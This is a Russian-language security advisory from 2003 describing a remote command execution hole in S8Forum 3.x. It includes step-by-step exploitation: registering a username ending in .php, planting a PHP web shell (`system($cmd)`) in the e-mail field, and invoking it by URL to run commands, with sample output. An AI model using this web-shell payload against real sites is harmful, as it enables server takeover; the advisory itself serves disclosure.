Удаленное выполнение произвольных команд в S8Forum

Дата публикации:
13.01.2003
Всего просмотров:
859
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
S8Forum 3.x
Описание: S8Forum (http://www.kellishaver.com/) уязвим к удаленному выполнению произвольных команд.

Когда пользователь регистрируется на форуме, локально создается файл с указанным именем пользователя с данными пользователя. В результате, злонамеренный пользователь может создать файл со злонамеренным именем и PHP (.php) расширением, который будет содержать злонамеренный PHP код. Этот файл может быть вызван через HTTP. Пример:

- go to Register

- insert in Username:
any_name.php   
NOTE: .php :)

- in password : any_pasword.

- in E-Mail:

<? system($cmd); ?>

or any code :(

- now go to  this URL:

http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a

------ out ---

evil.php:c4ca4238a0b923820dcc509a6f75849b Linux
xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002
i686 unknown 

------ out ---
Уязвимость обнаружена в Kelli Shaver S8Forum 3.0

Ссылки: A security vulnerability in S8Forum
или введите имя

CAPTCHA